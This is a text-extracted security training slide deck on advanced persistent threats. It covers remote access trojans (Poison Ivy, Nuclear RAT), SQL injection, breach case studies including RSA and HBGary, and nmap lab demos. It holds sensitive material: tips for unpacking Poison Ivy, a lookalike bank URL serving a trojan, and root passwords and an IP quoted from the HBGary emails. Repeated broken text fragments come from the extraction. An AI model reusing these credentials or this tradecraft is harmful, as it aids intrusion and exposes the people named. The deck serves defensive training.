Greg Hoglund Page 139 | YYYY MM DD | CONFIDENTIAL APT in Depth REMOTE ACCESS TOOLS (RAT) Page 140 | YYYY MM DD | CONFIDENTIAL 70 10/10/2011 RATs • Also known as “Implants” – – – – – The “persistent” p backdoor p program g Hide in plain site strategy General purpose hacking tool Stealth capabilities In-field update capabilities Page 141 | YYYY MM DD | CONFIDENTIAL RATs • According to Wikipedia: A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as: – – – – – – Screen/camera capture or control File management (download/upload/execute/etc.) Shell control (usually piped from command prompt) Computer control (power off/on/log off) Registry management (query/add/delete/modify) Other product-specific function • Watch out for terminology: server is the remote part, client is the GUI C&C part Page 142 | YYYY MM DD | CONFIDENTIAL 71 10/10/2011 RATs • Many Chinese hacker websites offer these tools for download, including links to reduh, WebShell, ASPXSpy, etc, plus exploits and zero-day malware. Page 143 | YYYY MM DD | CONFIDENTIAL RATs • • • • Nuclear RAT Gh0st RAT Bifrost Remote Controller Poison Ivy Page 144 | YYYY MM DD | CONFIDENTIAL 72 10/10/2011 Poison Ivy • Polymorphic encryption y p decryption yp routine • Polymorphic • Add unique tricks to bypass sandbox and memory scan Page 145 | YYYY MM DD | CONFIDENTIAL Poison Ivy Page 146 | YYYY MM DD | CONFIDENTIAL 73 10/10/2011 Poison Ivy A 7kb file? Probably not much in there… but let’s try anyway. Page 147 | YYYY MM DD | CONFIDENTIAL Poison Ivy RAT • Free for download at www.poisonivy-rat.com • The license says you can order special, undetected version • It also says that updating to new version is very easy because the remote part does not need to be updated Page 148 | YYYY MM DD | CONFIDENTIAL 74 10/10/2011 Poison Ivy RAT • In the Poison Ivy naming g convention (other RATs as well), the client is the GUI console and the server is the remote agent siting in the infected f computer Page 149 | YYYY MM DD | CONFIDENTIAL Poison Ivy - Server • Generated from within the client with user supplied options (IP to connect, password etc.) • Very small: around 6 kb of code (position independent) independent), all the rest sent on-demand from the client • Hides very well in the system: I’ve seen behavioral tools failing to detect it because they couldn’t reconginze the API calls • Generate options include: – – – – – Password when authenticating with the client IP address to connect to Is starting at boot or no Where to drop the EXE Whether to perform the code injection, etc, etc. Page 150 | YYYY MM DD | CONFIDENTIAL 75 10/10/2011 Poison Ivy - Server Page 151 | YYYY MM DD | CONFIDENTIAL Poison Ivy – The Client • Its capabilities include: – – – – – – – – – – – – – File manager File shredder Registry manipulator Process viewer and manipulator Services and driver viewer TCP/IP relay proxy Active connection and port lister Remote cmd.exe shell P Password dd dumper Key logger Screen and audio capture Internet camera capture Has plugin architecture that allows writing more Page 152 | YYYY MM DD | CONFIDENTIAL 76 10/10/2011 Poison Ivy – Network • Site says it uses Camelia Encryption Challenge-response response authentication: first 256 • Challenge random bytes is a chalenge, the client sends the response and the server verifies if the client knows the password • The encryption is not well implemented; reseeding eseed g tthe e ccrypto ypto with t eac each ttrasmission as ss o Page 153 | YYYY MM DD | CONFIDENTIAL Poison Ivy – Network • The encryption routines can be spotted by seeing g a lot of arithmetic operations p • By tracing how these function work, we can locate the password – very important Page 154 | YYYY MM DD | CONFIDENTIAL 77 10/10/2011 Poison Ivy – Obfuscating the Code • Distributed obfuscated by ExeStealth v2.7x, as identified by DiE.exe (Detect-It-Easy), PEiD failed to detect it • The code is written in Borland Delphi • The packer performs antidebugging tricks such as spaghetti jumps, jumping to the middle of instruction, checking « BeingDebugged » flags, calculating the CRC over its own code • There is an easy trick to unpack this: after the first Access Violation exception, place the breakpoint on the CODE section – the next break will be OEP • We W need d to t hide hid th the d debugger; b Ph tO for PhantOm f Olly Oll is i ok! k! • The final step is to use Import Reconstructor with the appropiate plugin to rebuild the exe Page 155 | YYYY MM DD | CONFIDENTIAL Demo of Poison Ivy • The trick to PI is distribution of the “server” side of the trojan j • bank0famerica.com/login/downloadreport.exe • Let’s have a look… Page 156 | YYYY MM DD | CONFIDENTIAL 78 10/10/2011 Nuclear RAT • Developed by the “Nuclear Winter Crew” (217 600 bytes) is • The server component (217,600 dropped under Windows, System32, or Program Files folders, under a custom named folder; the default is NR. • Once the server component is run, it tries to connect co ect to its ts cclient, e t, tthat at listens ste s for o incoming co g connections on a configurable port, to allow the attacker to execute arbitrary code from his or her computer. Page 157 | YYYY MM DD | CONFIDENTIAL Nuclear RAT - Capabilities • • • • • • • • • Take screenshots View webcam shots Capturing key strokes from the keyboard General information about computer (Username, Timezone, Version installed, Language, Available drives, etc) Mouse control Remote BAT/VBS script execution Monitor resolution File Manager (Download files and folders, Delete, Upload, Execute, Rename, Copy, Set Attributes, Create Folder, etc) Window Manager (Hide, show, close, minimize/maximize, disable/enable X, rename caption, send keys, etc) • • • • • • • • • • • • • Process Manager (kill, unload DLL, list DLLs) Registry Manager (Create key, edit values REG REG_DWORD, DWORD REG REG_BINARY, BINARY REG_MULTI_SZ, REG_SZ, create values, rename values) Clipboard manager Plugins manager (to add extra funcionality to the malware) Shutdown computer Message Box Chat with infected machine Web downloader IP Scanner S Port redirect TCP tunnel HTTP Web server Shell console Page 158 | YYYY MM DD | CONFIDENTIAL 79 10/10/2011 Nuclear RAT • Is detectable by A/V • Not a polymorphic as Poison Ivy • Also known as – – – – – – – Backdoor.Delf.jl Backdoor.Delf.jw Backdoor.Win32.Nuclear.b Win-Trojan/NucRAT Win-Trojan:NucRAT Win32/Nuclear.AG Backdoor.Win32.Nuclear.ak Page 159 | YYYY MM DD | CONFIDENTIAL Demo of Nuclear Rat • The trick to NR, as with PI, is distribution of the “server” side of the trojan j • bank0famerica.com/login/downloadreport.exe • Let’s have a look… Page 160 | YYYY MM DD | CONFIDENTIAL 80 10/10/2011 APT in Depth WEB APPLICATIONS: SQL INJECTION Page 161 | YYYY MM DD | CONFIDENTIAL Un-validated User Input • Most commonly found vulnerability & most used in APT attacks involving web apps. User input is entered via the browser is automatically trusted by the server to be correct & logical • Little to no validation performed by server code to determine whether or not the input supplied supp ed was as valid a d • Ensure that the application accepts known, good input & verifies the supplied input at every instance it is received Page 162 | YYYY MM DD | CONFIDENTIAL 81 10/10/2011 Parameter Tampering • Parameter Tampering – Attack directed towards business logic g within the application – Attack that takes advantage of programmers’ use of hidden or fixed form fields as a security measure Page 163 | YYYY MM DD | CONFIDENTIAL Parameter Tampering • Lets use the example of an online store – Price information is stored in hidden HTML field with assigned dollar value – Assumption: hidden field won’t be edited – Attacker edits $ value of product in HTML – Attacker submits altered web page with new “price” – This is still widespread in many web stores Page 164 | YYYY MM DD | CONFIDENTIAL 82 10/10/2011 Parameter Tampering What if we changed the price from $274.85 to $2.74? Page 165 | YYYY MM DD | CONFIDENTIAL Parameter Tampering • With a proxy such as Paros Proxy we can modify y the request q Page 166 | YYYY MM DD | CONFIDENTIAL 83 10/10/2011 SQL Injection • SQL injection is a particularly widespread and dangerous g form of injection j – To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database – By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to th database the d t b Page 167 | YYYY MM DD | CONFIDENTIAL SQL Injection • SQL Injection happens when a developer accepts p user input p that is directly yp placed into a SQL Statement and doesn't properly filter out dangerous characters. • This can allow an attacker to not only steal data from your database, but also modify and delete it. Page 168 | YYYY MM DD | CONFIDENTIAL 84 10/10/2011 SQL Injection • Certain SQL Servers such as Microsoft SQL Server contain Stored and Extended Procedures (database server functions). • If an attacker can obtain access to these Procedures it may be possible to compromise the entire machine. Page 169 | YYYY MM DD | CONFIDENTIAL SQL Injection • Attackers commonly insert single qoutes into a URL's q query y string, g, or into a forms input p field to test for SQL Injection. • If an attacker receives an error message like the one below there is a good chance that the application is vulnerable to SQL Injection. Page 170 | YYYY MM DD | CONFIDENTIAL 85 10/10/2011 SQL Injection Example Page 171 | YYYY MM DD | CONFIDENTIAL SQL Injection Example Page 172 | YYYY MM DD | CONFIDENTIAL 86 10/10/2011 APT IN DEPTH DECONSTRUCTING THE ATTACK Page 173 | YYYY MM DD | CONFIDENTIAL Some Examples • • • • • • • Aurora Stuxnet HB Gary Sony PlayStation Network Night Dragon RSA Oakridge Page 174 | YYYY MM DD | CONFIDENTIAL 87 10/10/2011 Operation Aurora Page 175 | YYYY MM DD | CONFIDENTIAL Operation Aurora (January 2011) • Attack started in December, 2010 until beginning of January, 2011 • Sourced from servers in Taiwan, Texas and Illinois • Intellectual property was the was they were trying to steal • Demonstrated several of the key components of an APT • Speculations are a Chinese state-sponsored attack • IP addresses that were used had been used in the past against US companies and was confirmed to be Chinese State-sponsored (i.e. PLO) fits the profile • Google and at least 30 other companies (incl. Yahoo, Symantec, Juniper, Northrup Grumman and Dow Chemicals) were hit Page 176 | YYYY MM DD | CONFIDENTIAL 88 10/10/2011 Operation Aurora (January 2011) • Gipson, Hoffman & Pancione (LA law firm) e mails from • Also hit with spear phishing e-mails people staff recognized with a link/attachment • Attack reported to the FBI • They represented a US company over a legal dispute regarding a copyright infringement over China’s China s Green Dam software • Attack fit the profile of the Google attack Page 177 | YYYY MM DD | CONFIDENTIAL Operation Aurora (January 2011) • Attackers targeted software-configuration management (SCM) systems that held proprietary information of Google Google, Adobe and other Fortune 100 companies over several months. • Zero-day IE vulnerability • Was based on a vulnerability in IE known to Microsoft, but not seen actively in the “wild”. • Affects: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, 4 and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Page 178 | YYYY MM DD | CONFIDENTIAL 89 10/10/2011 Operation Aurora (January 2011) • To gain initial access to the victim’s networks, the attackers started with a targeted spear phishing attacks against the victim company • The email appeared to be from someone trusted. • Contained a link to a Taiwanese website that hosted malicious JavaScript. • The malware, in turn, exploited an IE vulnerability • The exploit triggers when Internet Explorer attempts to access memory that has been partially freed. Page 179 | YYYY MM DD | CONFIDENTIAL Operation Aurora • Once exploited, the victim machines connected to a number of C&C systems over TCP/443 think covert channel – Difficult to inspect (encrypted) – Not out of the ordinary Page 180 | YYYY MM DD | CONFIDENTIAL 90 10/10/2011 Operation Aurora • The attacker then used the owned machines to attack other systems y on the same network (pivoting). • In “Operation Aurora”, software configuration mgmt (SCM) systems were targeted due to the commonly insecure nature. e will see tthis s attac attack during du g tthe e • We demonstration section Page 181 | YYYY MM DD | CONFIDENTIAL Stuxnet Page 182 | YYYY MM DD | CONFIDENTIAL 91 10/10/2011 Stuxnet • Very complex SCADA attack • Stuxnet demonstrated that even isolated physical networks could be hacked. • Discovered by VirusBlokAda company in Minsk, Belarus in July, 2010 • Affecting >15 plants in Iran, Indonesia, India, UK North America, UK, America Korea Page 183 | YYYY MM DD | CONFIDENTIAL Stuxnet • Targets Siemens WinCCand SIMATIC Process Control System y (PCS7) ( ) • Programmable logic controller (PLC) rootkit • Symantec noted that 60% of worldwide targeted machines were in Iran • Put their nuclear enrichment program back as much as 5 yrs! • Many different ideas of who was responsible – Some say the US or its allies (i.e. Israel) Page 184 | YYYY MM DD | CONFIDENTIAL 92 10/10/2011 Stuxnet • Attacked Windows systems • Stuxnet had 5 zero-day vulnerabilities – one or two is common, common 5 is not • And used Conficker (MS08-067) to spread • Used many vulnerabilities previously patched in Windows (i.e. MS10-046 LNK Vulnerability) • Used the Shortcut icon vulnerability (MS10-046) – affecting every version of Windows since Wi d Windows 2000 ((even Wi Win 95) ((patched t h dA Aug 2 2, 2010) – Allows for execution without even opening a file Page 185 | YYYY MM DD | CONFIDENTIAL Stuxnet • • • • Written in different languages (i.e. C, C++) Used 7 methods of spreading itself Spread mostly through USB thumb drives Network shares, print spoolers & Siemens project files • UPX packed, XOR encoded everywhere • Connected to C&C and sent off some sensitive data, but mostly controlled the PLCs in-field Page 186 | YYYY MM DD | CONFIDENTIAL 93 10/10/2011 Stuxnet • MS10-046 (LNK Vulnerability) Almost two years old • MS08-067 (Server Service) Patched for two years • MS10-061 (Print Spooler) Disclosed over one year ago – Used to push a file to remote machine and have it execute • MOF ‘Feature’ Not a vulnerability? • WinCC DBMS Password Original work • Step7 Project Files Original work • MS10-073 ((Kbd Privilege g Escalation)) Original g work • Rootkit drivers signed with valid certificates (Realtek and Jmicron) Page 187 | YYYY MM DD | CONFIDENTIAL Stuxnet – Natanz Nuclear Facility • Iranian IR-1 centrifuge to increase from its normal operating speed of 1,064 hertz to 1,410 hertz for 15 minutes before returning to its normal frequency • Twenty-seven days later, the virus went back into action, slowing the infected centrifuges down to a few hundred hertz for a full 50 minutes. • The stresses from the excessive, then slower speeds caused the aluminum centrifugal tubes to speeds, expand, often forcing parts of the centrifuges into sufficient contact with each other to destroy the machine. Page 188 | YYYY MM DD | CONFIDENTIAL 94 10/10/2011 Stuxnet • Would record normal readings of the centrifuge p y these readings g to technicians and replay • Stuxnet would affect the performance of the equipment and provide false information to technicians • The other thing Stuxnet would do was if the technicians noticed (maybe based on sound) if the centrifuge was spinning out of control, they would go for the kill switch – Stuxnet knew how to disable that! Page 189 | YYYY MM DD | CONFIDENTIAL Future Affects of Stuxnet-like Threats • Infrastructure-based malware, APT – – – – – Water supplies pp Power grids Nuclear power plants Air traffic control Military Page 190 | YYYY MM DD | CONFIDENTIAL 95 10/10/2011 RSA Page 191 | YYYY MM DD | CONFIDENTIAL RSA • We assumed the hack on RSA was just that, a hack to get into RSA. • But, this is another indication of APT • The Lockheed hack may have been planned for quite a while - Hacking RSA was part of this plan. • Like the thief that breaks into an engineering company to steal the plans to a bank's building layout. • Wouldn’t surprise me if we don’t see increased attempts against other sub-contractors Page 192 | YYYY MM DD | CONFIDENTIAL 96 10/10/2011 RSA • Provides SecurID to White House, CIA, NSA Pentagon, NSA, Pentagon DHS DHS, Lockheed, Grumman, L3, etc. • Targeted e-mail sent to EMC employees on March 3, 2011 • Contained C i d an attachment called "2011 Recruitment plan.xls". Page 193 | YYYY MM DD | CONFIDENTIAL RSA • Opening the XLS attachment • Embedded flash object shows up as a [X] symbol in the spreadsheet Page 194 | YYYY MM DD | CONFIDENTIAL 97 10/10/2011 RSA • The Flash object is executed by Excel • Flash object j then uses a Flash Player y vulnerability y (CVE-2011-0609) to execute code and to drop a Poison Ivy backdoor (or PI-RAT) to the system. • Poison Ivy is a form of “Remote Access Toolkit” or RAT. • The exploit code then closes Excel and the infection over. e iss o • After this, Poison Ivy connects back to it's server at good.mincesur.com. Page 195 | YYYY MM DD | CONFIDENTIAL RSA • The domain mincesur.com has been used in p g attacks over an extended similar espionage period of time. • Once the connection is made, the attacker has full remote access to the infected workstation. • Even worse, it has full access to network drives that the user can access. • Apparently the attackers were able to leverage this vector further until they gained access to the critical SecurID data they were looking for. Page 196 | YYYY MM DD | CONFIDENTIAL 98 10/10/2011 RSA • To further obscure the removal of massive amounts of data,, the aggregated gg g data was placed in several compressed and password protected RAR files. • RAR is a compressed archive format for files. • They used FTP to transfer the RAR files to an outside outs de stag staging g server se e (a co compromised p o sed machine at a hosting provider). • Finally, the attackers pulled the files from the external compromised host. Page 197 | YYYY MM DD | CONFIDENTIAL Oakridge Labs Page 198 | YYYY MM DD | CONFIDENTIAL 99 10/10/2011 “One of our core competencies at the lab is cyber security research” (Thomas Zacharia – Deputy Director, Oak Ridge National Laboratory) Page 199 | YYYY MM DD | CONFIDENTIAL ORNL • Deliver scientific discoveries and technical breakthroughs for clean energy – home of the 1943 “Manhattan Project” • Spear-phishing campaign starting on April 7, 2011 • Directed at Oak Ridge's business systems • The attacks were launched through phishing emails that were sent to some 573 of 5000 lab employees. • The emails were disguised to appear like it came from the lab's HR department – regarding benefits related changes. Page 200 | YYYY MM DD | CONFIDENTIAL 100 10/10/2011 ORNL • 57 out of some 530 employees clicked on a link in the email 'campaign', according to Thomas Zacharia, ORNL deputy lab director • The emails contained a link that employees were asked to click on for further information. • The malware exploited a zero-day flaw in Internet Explorer, and compromised two of the 57 systems o sa an attac attacker e to install sta malware a aeo on a use user’s s • Allows machine if he or she visits a malicious web site. • Flaw was patched by Microsoft on April 12 (days after the first e-mail was received – server breach discovered on April 11). Page 201 | YYYY MM DD | CONFIDENTIAL ORNL • One of those two computers then spread the malware to other systems within the lab. • Some employees appear to have clicked on the link resulting in an information-stealing malware program being downloaded on their systems • Had to shutdown E-mail and Internet connection • Interestingly enough ORNL is a center of excellence for cyber security for the DOE and conducts research into malware and vulnerabilities in software and hardware as well as phishing attacks. Page 202 | YYYY MM DD | CONFIDENTIAL 101 10/10/2011 Sony Playstation Network Page 203 | YYYY MM DD | CONFIDENTIAL Sony PlayStation Network • Hacked by the group Anonymous in Apr 2011 • Called OpSony • Reported that a file named “Anonymous” was planted on PlayStation servers and it reportedly contains the words “We are Legion.” • Exposed the names, birthdays, email addresses, passwords, security questions, credit card details, of all PSN users. Page 204 | YYYY MM DD | CONFIDENTIAL 102 10/10/2011 Sony PlayStation Network • Actual attack vector will probably remain unknown • All the data was unencrypted! • Theory by security experts is an exploit as simple as basic SQL Injection/Parameter tampering. • Anonymous has performed similar attacks on other Sony realestate: • http://www.sonymusic.co.jp/bv/crohttp://www sonymusic co jp/bv/cromagnons/track.php?item=7419 Page 205 | YYYY MM DD | CONFIDENTIAL Sony PlayStation • Hacking of 77 million Sony users' data and caused 23-day y closure is expected p to cost the company $171M • Sony said the effects to the company of the March earthquake the struck Japan will be about $268.9 million. e co company pa y sa said d its ts loss oss for o tthe e fiscal sca yea year • The that ended on March 31 will be about $3.18 billion Page 206 | YYYY MM DD | CONFIDENTIAL 103 10/10/2011 HB Gary Page 207 | YYYY MM DD | CONFIDENTIAL “We were terrified. I saw all the fruits of my labor, my livelihood, being jeopardized.” (Greg Hoglund – HB Gary) Page 208 | YYYY MM DD | CONFIDENTIAL 104 10/10/2011 HBGary Federal – SQL Injection • Dismantled and humiliated by "Anonymous" g a SQL Injection j attack in a nearly y using meaningless web application as its start point • Used the hack against HBG’s CMS system • Rather than using an off-the-shelf CMS, HBG had a custom app built • Advantage g of off-the-shelf - thousands of users and regular bug fixes, resulting in a much lesser chance of extant security flaws. Page 209 | YYYY MM DD | CONFIDENTIAL HBGary Federal • The exact URL used to break into hbgaryfederal.com was http://www.hbgaryfederal.com/pages.php?pageNav= 2&page=27 • The URL has two parameters named pageNav and page, set to the values 2 and 27, respectively. • One or other or both of these was handled incorrectly by the CMS, allowing the hackers to retrieve data from the database that they shouldn't have been able to get. Page 210 | YYYY MM DD | CONFIDENTIAL 105 10/10/2011 HBGary Federal – SQL Injection • Specifically, the attackers grabbed the user database from the CMS—the list of usernames, e-mail addresses, and password hashes for the HBGary employees authorized to make changes to the CMS. • It stored only hashed passwords—passwords that have been mathematically processed with a hash function to yield a number from which the original password can't be deciphered (i.e. 897&%$$%) • Rainbow tables were used to brute force the hashes • CEO Aaron Barr and COO Ted Vera—used passwords that were very simple; each was just six lower case letters and two numbers Page 211 | YYYY MM DD | CONFIDENTIAL HB Gary – Password Reuse? • This should have only affected HB Gary Federal • Unfortunately for HBGary Federal, it was not. • Neither Aaron nor Ted followed best practices. • Instead, they used the same password in a whole bunch of different places places, including email, Twitter accounts, and LinkedIn. • For both men, the passwords allowed retrieval of e-mail Page 212 | YYYY MM DD | CONFIDENTIAL 106 10/10/2011 HB Gary…SSH without certs…bad. • Along with its web server, HBGary had a Linux machine, support.hbgary.com, on which many HBGary employees had shell accounts with ssh access, each with a password used to authenticate the user. • One of these employees was Ted Vera, and his ssh password was identical to the cracked password he used in the CMS. • This gave the hackers immediate access to the support machine. • HB Gary could have used certificate based authentication, but instead opted for passwords only. Page 213 | YYYY MM DD | CONFIDENTIAL HB Gary • Ted was only a regular non-superuser – meaning he could only see data owned by his account. • Unfortunately, the server was vulnerable to privilege escalation – essentially allowing a normal user to become “root”. • The error was published in October 2010 with a full, working exploit. • Byy November, o e be , most ost d distributions st but o s had ad patc patches es available, and there was no good reason to be running the exploitable code in February 2011. Page 214 | YYYY MM DD | CONFIDENTIAL 107 10/10/2011 HB Gary • Exploitation of this flaw gave the Anonymous attackers full access to HB Gary's y system y • It was then that they discovered many gigabytes of backups and research data, which they duly purged from the system Page 215 | YYYY MM DD | CONFIDENTIAL HB Gary • Aaron's password yielded even more fruit. HBGary used Google Apps for its e-mail services • For both Aaron and Ted, the password cracking provided access to their mail. • But Aaron was no mere user of Google Apps: his account was also the administrator of the company's mail. • With t hiss higher g e access, he e cou could d reset eset tthe e pass passwords o ds of any mailbox and hence gain access to all the company's mail—not just his own. It's this capability that yielded access to Greg Hoglund's mail. Page 216 | YYYY MM DD | CONFIDENTIAL 108 10/10/2011 HB Gary • And what was done with Greg's mail? engineering, that's that s what what. • A little bit of social engineering • Contained within Greg's mail were two bits of useful information. – The root password to the machine running Greg's rootkit.com site was either "88j4bb3rw0cky88" or "88Scr3am3r88". – Jussi Jaakonaho, "Chief Security Specialist" at Nokia, had root access. – Vandalizing the website stored on the machine was now within reach. Page 217 | YYYY MM DD | CONFIDENTIAL HB Gary • The attackers just needed a little bit more information: – they needed a regular, non-root user account to log in with, because as a standard security procedure, direct ssh access with the root account is disabled. – Armed with the two pieces of knowledge above, and with Greg's e-mail account in their control, the social engineers set about their task. Page 218 | YYYY MM DD | CONFIDENTIAL 109 10/10/2011 HB Gary • The e-mail correspondence tells the whole story: y – From: Greg To: Jussi Subject: need to ssh into rootkit im in europe and need to ssh into the server. can you drop open up firewall and allow ssh through port 59022 or something vague? and is our root password still 88j4bb3rw0cky88 or did we change to 88Scr3am3r88 ? thanks Page 219 | YYYY MM DD | CONFIDENTIAL HB Gary • From: Jussi To: Greg Subject: Re: need to ssh into rootkit hi, do you have public ip? or should i just drop fw? and it is w0cky - tho no remote root access allowed • From: Greg To: Jussi Subject: Re: need to ssh into rootkit no i dont have the public ip with me at the moment because im readyy for a small meeting g and im in a rush. if anything y g jjust reset my password to changeme123 and give me public ip and ill ssh in and reset my pw. Page 220 | YYYY MM DD | CONFIDENTIAL 110 10/10/2011 HB Gary • • From: Jussi To: Greg j Re: need to ssh into rootkit Subject: ok, it should now accept from anywhere to 47152 as ssh. i am doing testing so that it works for sure. your password is changeme123 i am online so just shoot me if you need something. in europe, but not in finland? _jussi From: Greg To: Jussi Subject: Re: need to ssh into rootkit if i can squeeze out time maybe we can catch up.. ill be in germany for a little bit. anyway I can't ssh into rootkit. you sure the ips still 65.74.181.141? thanks Page 221 | YYYY MM DD | CONFIDENTIAL HB Gary • • • • From: Jussi To: Greg Subject: j Re: need to ssh into rootkit does it work now? From: Greg To: Jussi Subject: Re: need to ssh into rootkit yes jussi thanks did you reset the user greg or? From: Jussi To: Greg Subject: j Re: need to ssh into rootkit nope. your account is named as hoglund From: Greg To: Jussi Subject: Re: need to ssh into rootkit yup im logged in thanks ill email you in a few, im backed up Page 222 | YYYY MM DD | CONFIDENTIAL 111 10/10/2011 HB Gary • To be fair to Jussi, the fake Greg appeared to know the root p password and,, well,, the e-mails were coming from Greg's own e-mail address. • But over the course of a few e-mails it was clear that "Greg" had forgotten both his username and his password. • And Jussi handed them to him on a platter Page 223 | YYYY MM DD | CONFIDENTIAL Night Dragon Page 224 | YYYY MM DD | CONFIDENTIAL 112 10/10/2011 Night Dragon (Jan-Feb 2011) • Night Dragon is a coordinated covert and targeted cyberattack • Conducted against global oil oil, energy energy, and petrochemical companies. – Exxon Mobil, Royal Dutch Shell, BP, Marathon Oil, ConocoPhillips and Baker Hughes • The attack has involved: – – – – – Social engineering, Spear-phishing attacks, Exploitation of Microsoft Windows OS vulnerabilities, Mi Microsoft ft Active A ti Directory Di t compromises, i The use of remote administration tools (RATs) • The objective is to harvesting sensitive competitive proprietary operations and project-financing information Page 225 | YYYY MM DD | CONFIDENTIAL Night Dragon Page 226 | YYYY MM DD | CONFIDENTIAL 113 10/10/2011 Night Dragon • The Night Dragon attacks work by methodical and p progressive g intrusions into the targeted g infrastructure. • Several basic activities are performed by the Night Dragon operation: – Deploy privately developed and customized RAT tools, by first compromising perimeter security controls, th through h SQL SQL-injection i j ti exploits l it off extranet t t web b servers, as well as targeted spear-phishing attacks of mobile worker laptops, Page 227 | YYYY MM DD | CONFIDENTIAL APT in Depth DEMONSTRATIONS Page 228 | YYYY MM DD | CONFIDENTIAL 114 10/10/2011 Objectives • To tie everything together we have learned p an attacker uses to • Show some of the steps compromise systems • To get into the mindset of an attacker so that, as an incident handler, you can anticipate their moves • To gain hands-on experience with various attack tools • To understand how the defenses work and why they are important Page 229 | YYYY MM DD | CONFIDENTIAL So how do hackers do it? • They have a process (with steps) of their own! – Step 1 – Reconnaissance “Recon” – Step 2 – Scanning – Step 3 – Exploit Systems • Gaining Access • Elevating Access • App-level App level Attacks • Denial of Service – Step 4 – Keeping Access – Step 5 – Covering the Tracks Page 230 | YYYY MM DD | CONFIDENTIAL 115 10/10/2011 Step 1 - Recon • Open source investigation to gain information about a target g Page 231 | YYYY MM DD | CONFIDENTIAL Step 2 - Scanning • Attacker uses a variety of mechanisms to survey y a target g to find holes in target’s g defenses. Page 232 | YYYY MM DD | CONFIDENTIAL 116 10/10/2011 Step 3 - Exploiting • The attacker tries to gain access, undermine an application pp or deny y access to other users. Page 233 | YYYY MM DD | CONFIDENTIAL Step 4 – Keeping Access • Attacker maintains access by manipulating the software installed on the system y to achieve backdoor access. Page 234 | YYYY MM DD | CONFIDENTIAL 117 10/10/2011 Step 5 – Covering the Tracks • The attackers maintain their hard-fought access by y covering g their tracks. • They hide from users and systems administrators using a variety of techniques Page 235 | YYYY MM DD | CONFIDENTIAL STEP 1 - Recon Page 236 | YYYY MM DD | CONFIDENTIAL 118 10/10/2011 Recon • Reconnaissance is “casing the joint” • Two general types of attackers: – What we used to call “script kiddies” – Look for low hanging fruit, and may skip this step – Attackers out to get a particular site – this step is extremely important • To begin an attack, your adversary will gather as much information as possible from open sources. • Before bandits rob a bank, they will visit the branch, look at the times the guards enter and leave, and observe the location of cameras. Page 237 | YYYY MM DD | CONFIDENTIAL Recon • • • • • • • Domain Information Leakage (aka whois) DNS Interrogation Web site searches Using Google as a Recon tool Sam Spade Web-based recon and attack tools Think Advanced Persistent Threat! Page 238 | YYYY MM DD | CONFIDENTIAL 119 10/10/2011 STEP 2 - Scanning Page 239 | YYYY MM DD | CONFIDENTIAL Scanning • After completing a thorough reconnaissance of the target, g , attackers begin g scans to find openings in the target system Page 240 | YYYY MM DD | CONFIDENTIAL 120 10/10/2011 Scanning the Perimeter • Scanning is normally one of the initial activities an attacker may y conduct to identify y any vulnerable hosts that can be exploited • We see numerous “port scanning” event Page 241 | YYYY MM DD | CONFIDENTIAL What does this look like… Page 242 | YYYY MM DD | CONFIDENTIAL 121 10/10/2011 Running NMAP • Simple ARP Ping Scan – nmap p -v -sn 192.168.67.0/24 ((ARP Ping g Scan)) • Run a port scan – nmap -sV 192.168.67.0/24 – In our case (to save time) – nmap –sV 192.168.67.10-11 Page 243 | YYYY MM DD | CONFIDENTIAL Nmap Demonstration Page 244 | YYYY MM DD | CONFIDENTIAL 122 10/10/2011 What Did nmap tell us? • 192.168.67.10 – – – – Probably Windows Box Web server DNS lots of SMB stuff (AD maybe?) • 192.168.67.11 – Probably Windows Box – RPC stuff – uPNP • 192.168.67.12 – Attacker Machine • 192.168.67.13 – – – – – – – ftp (vsftpd) SSH – OpenSSH HTTP – Apache Samba NFS MySQL Probable UNIX Page 245 | YYYY MM DD | CONFIDENTIAL O/S Fingerprinting Page 246 | YYYY MM DD | CONFIDENTIAL 123 10/10/2011 O/S Fingerprinting • OS Fingerprinting is a method of detecting the remote host’s operating p g system y using g information leaked by that host’s TCP stack. To do this, we use: – the responses it gives to carefully crafted packets (active mode) – or by observing captured network traffic (passive mode). • These methods are possible because each OS implements their TCP stack differently. • OS Fingerprinting (ab)uses these differences. Page 247 | YYYY MM DD | CONFIDENTIAL Use of nmap for O/S Fingerprinting • nmap -O 192.168.67.10 192.168.67.11 192.168.67.13 – 192.168.67.10 – 192.168.67.11 – 192.168.67.13 Windows XP (maybe) Windows XP Linux Page 248 | YYYY MM DD | CONFIDENTIAL 124 10/10/2011 Nmap Demonstration Page 249 | YYYY MM DD | CONFIDENTIAL Vulnerability Scanners Page 250 | YYYY MM DD | CONFIDENTIAL 125 10/10/2011 Vulnerability Scanners • Tools to help map a network, scan for open ports, and find various vulnerabilities • Test against a list of know exploits – What about the unknown? – That’s why we want to have security in-depth! • Generate pretty reports – Information overload – What do you do with a 2,000 page report? • Diff Difference b between t vulnerability l bilit scanning i and d exploitation? – Vulnerability scan only tests theoretically that a system is vulnerable system is not normally exploited Page 251 | YYYY MM DD | CONFIDENTIAL Vulnerability Scanners • • • • • Vulnerability database - It contains a list of vulnerabilities for a variety of systems and describes how those vulnerabilities should be checked. User configuration tool - By interacting with this component of the vulnerability scanner, the user selects the target systems and identifies which vulnerability checks to run. Scanning engine - Based on the vulnerability database and user configuration, this tool formulates packets and sends them to the target to determine whether vulnerabilities are present. Knowledge base of current active scan – Keeps track of the current scan, remembering the discovered vulnerabilities, and feeding data to the scanning engine. Results repository and report generation tool Generates reports for its user, explaining which vulnerabilities were discovered on which targets and possibly recommending remedial actions for dealing with the discovered flaws. Page 252 | YYYY MM DD | CONFIDENTIAL 126 10/10/2011 A bunch of vulnerability scanners Page 253 | YYYY MM DD | CONFIDENTIAL Vulnerability Scanner - Nessus Page 254 | YYYY MM DD | CONFIDENTIAL 127 10/10/2011 Nessus • Free (kind of), open-source general vulnerability scanner maintained by Tenable Network Security – Software is free – Signatures are either free (home feed) or $$$ (professional feed) – Difference is how often you get updates • As such it is used by the white hat community as well as the black hat community • Project started by Renaud Deraison • Available at www.nessus.org www nessus org • Consists of a client and server, with modular plug-ins for individual tests • Now the client is web-based Page 255 | YYYY MM DD | CONFIDENTIAL Nessus - Architecture • Client-server architecture • Both can run on the same machine • Tenable now will outsource the 